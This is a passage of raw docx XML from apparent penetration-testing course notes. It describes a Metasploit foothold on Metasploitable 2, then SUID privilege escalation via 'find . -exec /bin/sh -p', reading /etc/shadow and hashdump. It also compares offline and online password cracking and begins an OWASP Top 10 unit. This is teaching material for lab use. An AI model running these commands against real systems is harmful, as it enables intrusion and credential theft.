        <w:t xml:space="preserve"> Describe the complete workflow of gaining an initial Meterpreter foothold on Metasploitable 2 and escalating to root, naming each Metasploit/Linux technique used and why each step is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow starts in msfconsole: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> locates an exploit module matching a discovered vulnerable service (for example the vsftpd 2.3.4 backdoor found during Unit II scanning), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> loads it, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals required settings, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> target the service, a payload is chosen and configured with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> launches the attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A successful exploit opens a session — often running as a low-privilege account such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">daemon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because many valuable actions need higher privileges, the tester next checks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for any exploitable sudo rights, and runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list SUID binaries. Cross-referencing any found binary against GTFOBins identifies a known escalation command — for instance, an SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -exec /bin/sh -p \;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to spawn a root shell, since the spawned process inherits find's elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The tester confirms success with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (showing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), then reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as direct proof of root access and to harvest password hashes for later offline cracking with John the Ripper or Hashcat. Throughout, Meterpreter's post-exploitation commands (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) are used to document the system state and findings for the final report — all within the isolated lab, never on an unauthorised system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compare offline password cracking (John the Ripper, Hashcat) with online brute-force (Hydra), and explain the defences that are effective against each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Offline cracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works on a file of already-obtained password hashes (for example from a hashdump), with no further interaction with the live system required. John the Ripper runs dictionary attacks against a wordlist like rockyou.txt; Hashcat does the same but is GPU-accelerated and supports many hash types selected by a mode number, making it far faster for large wordlists or brute-force character-set attacks. Because it happens entirely offline, there is no rate limit or lockout to slow the attacker down — the only real defence is making the hashes themselves hard to crack, through slow, salted algorithms such as bcrypt or Argon2, and through strong, unique passwords that resist dictionary and brute-force guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Online brute-force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Hydra instead attacks a live service directly — an SSH daemon or an HTTP login form — by submitting many username/password combinations over the network. This is inherently slower (limited by network round-trips and the service's own response time) and, critically, is visible to the target: every attempt can be logged. This is exactly why account lockout policies, rate limiting, CAPTCHA, and multi-factor authentication are effective specifically against Hydra-style attacks — they either slow the attacker to an impractical rate or require a second factor the attacker does not have, whereas these same controls have no effect at all on offline cracking once hashes have already been stolen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In short: offline cracking defences focus on the strength of the hash and password itself, because the attacker already has the data; online brute-force defences focus on limiting and detecting repeated attempts, because the attacker must interact with the live service every time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit IV — Web Application Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This unit covers the OWASP Top 10 risk categories, the Burp Suite workflow used to test for them manually, and hands-on techniques against DVWA (Damn Vulnerable Web Application) for SQL Injection, XSS, file upload, CSRF and broken authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 A Note on the OWASP Top 10 Category List</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Syllabus clarification — please read before this section</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Your official syllabus lists the categories as: A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection, A04 Insecure Design, A05 Security Misconfiguration, A06 Vulnerable and Outdated Components, A07 Identification and Authentication Failures, and A08 SSRF.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">official OWASP Top 10 (2021 edition)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> lists ten categories, and in that official numbering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF (Server-Side Request Forgery) is A10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, not A08. OWASP's actual A08 is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">“Software and Data Integrity Failures”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. insecure CI/CD pipelines, unsigned/untrusted updates), and A09 is “Security Logging and Monitoring Failures”.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This study material covers all eight topics your syllabus names, in the order given, and also explains what the official A08 (Software and Data Integrity Failures) covers so you are not caught out if a question references the official numbering. Please confirm with your instructor which numbering they expect in an exam answer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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2047"/>
        <w:gridCol w:w="4093"/>
        <w:gridCol w:w="3606"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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What Goes Wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Typical Defence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A01 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
